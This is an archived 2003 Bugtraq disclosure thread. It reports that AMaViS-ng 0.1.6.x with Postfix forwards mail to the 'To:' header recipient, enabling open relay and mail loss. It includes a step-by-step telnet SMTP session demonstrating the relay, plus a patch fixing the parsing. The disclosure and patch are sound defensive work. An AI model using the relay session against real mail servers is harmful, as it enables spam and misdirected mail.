linux, säkerhet

98077 2003-04-08  18:38  /62 rader/ Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>
Importerad: 2003-04-08  18:38  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4413>
Ärende: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss
------------------------------------------------------------
Hi everyone -

with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3;
0.1.4.x is  not vulnerable), all email gets forwarded to the address
specified by the  "To:" header line, ignoring the real recipient
given via "RCPT TO:".

Possible exploit:
--%snip%--
#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:userX@domainX.tld
(250 ok)
rcpt to:userY@domain.tld
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: userX@domainX.tld
To: userZ@domainZ.tld
Subject: AMaViS-ng 0.1.6.x bug
.
(250 Ok: queued as ...)
quit
(221 Bye)
--%snip%--

Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng
0.1.6.x  installed must accept emails for userY@domain.tld.

What does it to: userX@domainX.tld is sending an email to
userY@domain.tld. The header of this  email contains "To:
userZ@domain.tld". AMaViS-ng seems to parse the header  and forwards
the email to userZ@domain.tld. userY@domain.tld does not get  this
email.  As many postfix users trust their localhost (no restrictions
for localhost),  it is possible to relay an email or a spam mail this
way.

configuration files (relevant parts):

# $postfix/master.cf
smtp inet n - n - - smtpd -o content_filter=filter:
filter unix - n n - - pipe
  flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient}
# end of master.cf

# $amavis-ng/amavis.conf
[global]
mail-transfer-agent = Postfix

[Postfix]
postfix = /usr/sbin/sendmail
args = -i -f
# end of amavis.conf

There is no problem with AMaViS == 0.1.4.x

Kind regards,

Phil Cyc
(98077) /Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>/(Ombruten)
98298 2003-04-10  06:46  /12 rader/ Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>
Importerad: 2003-04-10  06:46  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4437>
Kommentar till text 98077 av Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>
Ärende: Re: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss
------------------------------------------------------------
Hi -

As long as the problem is not fixed by the AMaViS-ng maintainers,
this patch  could be helpful.

I took the relevant part from the version 0.1.4.1 source. This patch 
(attachment) applies to 0.1.6.3.

Kind regards,

Phil Cyc
(98298) /Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>/(Ombruten)
Bilaga (text/x-diff) i text 98299
98299 2003-04-10  06:46  /32 rader/ Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>
Bilagans filnamn: "postfix.patch"
Importerad: 2003-04-10  06:46  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4438>
Bilaga (text/plain) till text 98298
Ärende: Bilaga (postfix.patch) till: Re: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss
------------------------------------------------------------
diff -Nru amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm
amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm
--- amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm	Tue Mar 18
00:04:21 2003
+++ amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm	Tue Apr  8 23:28:09 2003
@@ -112,22 +112,11 @@
 
   writelog($args,LOG_DEBUG, "Called as amavis ".join(' ',@ARGV));
 
-  while (shift @ARGV) {
-    /^-f$/ && next; # ignore "-f"
-    /^-d$/ && next; # ignore "-d"
-    s/^(.*)$/$1/; # untaint sender or recipient
-    if (not defined $$args{'sender'}) {
-      if (/^$/) {
-	$$args{'sender'} = "<>";
-      }
-      else {
-	$$args{'sender'} = $_;
-      }
-    }
-    else {
-      push @{$$args{'recipients'}}, $_;
-    }
-  }
+  shift @ARGV if $ARGV[0] eq "-f";
+  $$args{'sender'} = shift @ARGV;
+  $$args{'sender'} = "<>" if (!$$args{'sender'});
+  shift @ARGV if $ARGV[0] eq "-d";
+  push @{$$args{'recipients'}}, @ARGV;
 
   # Message file has been written, reset file pointer and put it into
   # the record.
(98299) /Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>/(Ombruten)